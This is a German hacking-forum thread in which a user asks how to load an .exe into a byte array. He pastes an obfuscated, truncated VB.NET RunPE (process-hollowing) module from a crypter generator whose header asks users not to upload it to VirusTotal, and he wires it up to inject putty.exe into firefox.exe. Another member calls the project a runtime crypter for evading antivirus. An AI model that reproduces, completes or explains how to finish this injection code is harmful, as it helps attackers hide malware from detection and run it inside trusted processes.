Seite 1 von 2 12 LetzteLetzte
Ergebnis 1 bis 10 von 18
  1. #1
    Trojaner
    Registriert seit
    04.03.2007
    Beiträge
    82

    Lächeln Exe to Byte Variable

    Hallo zusammen,

    ich habe mal ein bisschen mit VB bzw. C# angefangen und programmiere nun ein wenig herum um erst einmal ein wenig Grundwissen zu schaffen
    Nun bin ich an einem Punkt angekommen, wo ich gerne eine ausführbare Datei (.exe) in eine Byte Variable einlesen möchte.

    Leider habe ich noch nicht so wirklich herausgefunden wie das funktioniert.

    Vielleicht kann mir ja hier jemand weiter helfen.

    Liebe Grüße
    Dok


  2. #2
    Der Jesus der Informatik
    Registriert seit
    01.12.2007
    Beiträge
    216

    Standard

    Es gibt ein Byte große Executables? Wäre mir neu. o.O






  3. Folgende Benutzer haben sich für diesen Beitrag bedankt:

    SFX (10.10.2010)

  4. #3
    Trojaner
    Registriert seit
    04.03.2007
    Beiträge
    82

    Standard

    Hm,... hatte das so interpretiert. Ich wollte nun mal eine Exe Datei erst in den Ram laden und dann ausführen. Hab dann gelesen das man dafür ein extra Modul braucht (warum auch immer ^^).

    '----------------------------------------------------------------------------------------- ' Function to Call RunPE is : TpOHArRmqVCNRCcPTneTI - Das ist die Funktion die du callen musst!!!!!!! ' This RunPE was created by RunPE Generator v1.7 for VB.NET by SP7 at 04.10.2010 17:38:44 ' Please don't upload this code to VirusTotal or another site like that bullshit... ' Thanks to: HorstEwald, ShockerZz and t0fx '----------------------------------------------------------------------------------------- Imports System.Runtime.InteropServices Imports System.ComponentModel Public Class JGnVNtPuACitetcCKnEnk Public Const ktfWXASZoTPeuSXTvuRAw As Long = &H200 Public Const gUhstDdGeeknMHckWACTR As Long = &H40 Public Const hspjiMKKPcejqEmXmZOKW As Long = &H80 Public Const MihlsQNmGsMUJahoagcTi As Long = &H20 Public Const nYamGUQSuMrEYwcIOnpdu As Long = &H10 Public Const RNToRXTukcYmnVXaDuGnJ As Long = &H8 Public Const kXjCRgICUVIJUirMGSnnV As Long = &H1 Public Const ONcEbkLfLlnrkHmdrZDAh As Long = &H4 Public Const pCVGmnOKCEVcCdhufgQKt As UInt32 = &H2 Shared Sub TpOHArRmqVCNRCcPTneTI(ByVal VQVvmEvqbTuJwwlBjPqKN() As Byte, ByVal RoXUKGJXReRSOlqSKSbeg As String) Dim seQWVKMCIuwDdKljvZpns = New tFXNKUqGqtrwKGvWPCEeA.XsQOVXtihMYhadqnDIRoM, TTSkqaHPWXtqpSvHaLDKe As tFXNKUqGqtrwKGvWPCEeA.VrZbfklTHVnmWOIrrlPBk, whSdqnovvmVXlkDLfscLw = New tFXNKUqGqtrwKGvWPCEeA.aXLeDrqbmFDIEKvdTCpUL, EMEgOvtGdVhpTgquHIGeX = New tFXNKUqGqtrwKGvWPCEeA.XWUrOGiLNORMAsMgKenei, BMNtZKloEfwuQRHAvlDou = New tFXNKUqGqtrwKGvWPCEeA.dBGvjOoTsveffoCSjsRBJ, HowwuRrvjOMQuNujXCeLV = New tFXNKUqGqtrwKGvWPCEeA.dBGvjOoTsveffoCSjsRBJ Dim IPGnjbYCUMGMbJHWobqBb = GCHandle.Alloc(VQVvmEvqbTuJwwlBjPqKN, GCHandleType.Pinned) Dim EnIMIejgJYaVrvMmPecVt As Integer = IPGnjbYCUMGMbJHWobqBb.AddrOfPinnedObject.ToInt32 Dim fdBOShmLAoIGJVHHDlpeI As New tFXNKUqGqtrwKGvWPCEeA.hEIFHrTPimDCnRRqTNEVO fdBOShmLAoIGJVHHDlpeI = Marshal.PtrToStructure(IPGnjbYCUMGMbJHWobqBb.AddrO fPinnedObject, fdBOShmLAoIGJVHHDlpeI.GetType) IPGnjbYCUMGMbJHWobqBb.Free() If tFXNKUqGqtrwKGvWPCEeA.CreateProcess(Nothing, RoXUKGJXReRSOlqSKSbeg, BMNtZKloEfwuQRHAvlDou, HowwuRrvjOMQuNujXCeLV, False, 4, Nothing, Nothing, EMEgOvtGdVhpTgquHIGeX, whSdqnovvmVXlkDLfscLw) = 0 Then Return Dim LrBGSvWrZFhkGnMLHURfa As New tFXNKUqGqtrwKGvWPCEeA.HSDcnAhYPQFtVcRcfXDBs LrBGSvWrZFhkGnMLHURfa = Marshal.PtrToStructure(New IntPtr(EnIMIejgJYaVrvMmPecVt + fdBOShmLAoIGJVHHDlpeI.IqKTcKOcAPwpCZaOvAPpA), LrBGSvWrZFhkGnMLHURfa.GetType) Dim IqKTcKOcAPwpCZaOvAPpA, jgDVnORHofeaRvVgjGcCM As Long, NWtWBRUkfvMLhUQAXNqLY As UInteger EMEgOvtGdVhpTgquHIGeX.pLlYLVXPWOqtwqLRMUGVk = Len(EMEgOvtGdVhpTgquHIGeX) End Class
    Ein wenig gekürzt, da zu lang

    und als Erklärung zum Call was folgendes Dabei:

    Code:
    JGnVNtPuACitetcCKnEnk.TpOHArRmqVCNRCcPTneTI(Bytes As Bytes(), Ziel as String)
    Jetzt dachte ich, dass Bytes As Bytes() die Datei in einer Byte Variable darstellen soll. Und bei Ziel war ich mir auch nicht sicher.

    Am lieben würde ich ja sagen ("paint.exe","testprozess") aber das wäre ja zu einfach anscheinend

    Liebe Grüße
    Dok
    Geändert von DoktorByte (04.10.2010 um 19:31 Uhr)


  5. #4
    Fortgeschrittener
    Registriert seit
    20.02.2008
    Beiträge
    45

    Standard

    File.ReadAllBytes(string DateiPfad)
    Liefert ein byte-Array zurück.

    Zitat Zitat von DizzY_D Beitrag anzeigen
    Es gibt ein Byte große Executables? Wäre mir neu. o.O
    Natürlich gibt es das:
    • Erstelle eine txt
    • Schreib nen Nuller rein
    • und ändere die Endung auf .exe
    Geändert von LoveSecretGod (04.10.2010 um 19:38 Uhr)

  6. #5
    Trojaner
    Registriert seit
    04.03.2007
    Beiträge
    82

    Standard

    Zitat Zitat von LoveSecretGod Beitrag anzeigen
    File.ReadAllBytes(string DateiPfad)
    Liefert ein byte-Array zurück.


    Natürlich gibt es das:
    • Erstelle eine txt
    • Schreib nen Nuller rein
    • und ändere die Endung auf .exe
    Supi danke dir. Das scheint schon mal zu funktionieren. Zumindest wirft Visual Studio keine Fehlermeldung mehr raus.

    Jetzt muss ich nur noch herausfinden, was ich als Ziel angeben muss. Weil Momentan kann ich das Programm zwar starten aber es tut sich nichts ^^

    Code:
    Dim DateiPfad As String = "C:\putty.exe"
            Dim Test2 As String = "testproc"
            NwASgwPLktfTRPANmVZID.ZosilFQkETXTHQSokNfAw(File.ReadAllBytes(DateiPfad), Test2)


  7. #6
    Fortgeschrittener
    Registriert seit
    20.02.2008
    Beiträge
    45

    Standard

    Zitat Zitat von DoktorByte Beitrag anzeigen
    Code:
    Dim DateiPfad As String = "C:\putty.exe"
    Ich weiß nicht wie es bei Visual Basic ist, aber bei C# macht man einen Doppel-BackSlash '\\' weil einer für verschiedene String-Formatierungen oder wie man sagt zuständig ist..

    Oder du stellst vor dem String ein @-Zeichen hin. Damit ist ein Backslash auch ein Backslash, ohne dass jetzt irgendwie was formatiert wird.

    string blabla = @"C:\wuff.txt";

  8. #7
    Trojaner
    Registriert seit
    04.03.2007
    Beiträge
    82

    Standard

    Nochmal ein kleiner Zwischenstand:

    Mittlerweile sieht mein Code so aus:

    Code:
    Dim DateiPfad As String = "C:\putty.exe"         
    Dim Test2 As String = "firefox.exe"         
    NwASgwPLktfTRPANmVZID.ZosilFQkETXTHQSokNfAw(File.ReadAllBytes(DateiPfad), Test2)
    Die Exe Datei wird wohl in einen anderen Prozess Injectet. Leider wird Putty nicht gestartet was richtig sein soll, wegen der Injection. Ich werde mir morgen mal den Kopf zerbrechen, wie ich testen kann ob es wirklich das tut was ich möchte.

    Liebe Grüße
    Dok

    Und danke nochmal an alle


  9. #8
    Capt'n Crunch Avatar von hackerking
    Registriert seit
    08.11.2008
    Beiträge
    964

    Standard

    Vote4Close
    Da versucht jemand mit seinen Fragen und seinem Copy&Paste Skill einen RT Crypter zu "erstellen"

  10. Folgende Benutzer haben sich für diesen Beitrag bedankt:

    DarkFire (04.10.2010)

  11. #9
    Trojaner
    Registriert seit
    04.03.2007
    Beiträge
    82

    Standard

    Auch wenn ich dich enttäuschen muss, ich versuche keinen Crypter zu "erstellen", weil ich zum ersten dafür keine Verwendung habe und zum anderen meine Kenntnisse wahrscheinlich bei weiten weiten weiten nicht ausreichen würden.
    Ich spiele nur ein wenig, weil wir in der Berufsschule mit C# begonnen haben und ich mich privat ein wenig für VB interessiere.

    In dem Sinne...
    Dok


  12. #10
    Capt'n Crunch Avatar von hackerking
    Registriert seit
    08.11.2008
    Beiträge
    964

    Standard

    Zitat Zitat von DoktorByte Beitrag anzeigen
    Auch wenn ich dich enttäuschen muss, ich versuche keinen Crypter zu "erstellen",
    das ist nich dein ernst.. alder, die trash namen sind ja fürs ordentliche programmieren und nich um das ding ud zu kriegen...
    und du willst grundlos in firefox injecten nä? reiner zufall

    Zitat Zitat von DoktorByte Beitrag anzeigen
    weil ich zum ersten dafür keine Verwendung habe und zum anderen meine Kenntnisse wahrscheinlich bei weiten weiten weiten nicht ausreichen würden.
    deswegen c&p'st du



    Vote4Kick
    Vote4Close

    Abschaum

  13. Folgende Benutzer haben sich für diesen Beitrag bedankt:

    DarkFire (04.10.2010)

Seite 1 von 2 12 LetzteLetzte

Ähnliche Themen

  1. untermenü aus variable
    Von dokdobler im Forum Delphi
    Antworten: 3
    Letzter Beitrag: 01.06.2010, 21:29
  2. Variable(n) in Anführungszeichen
    Von Nero im Forum VisualBasic
    Antworten: 9
    Letzter Beitrag: 26.09.2008, 16:19
  3. Datum in einer variable
    Von errox im Forum C, C++
    Antworten: 7
    Letzter Beitrag: 04.09.2007, 21:47

Stichworte

Berechtigungen

  • Neue Themen erstellen: Nein
  • Themen beantworten: Nein
  • Anhänge hochladen: Nein
  • Beiträge bearbeiten: Nein
  •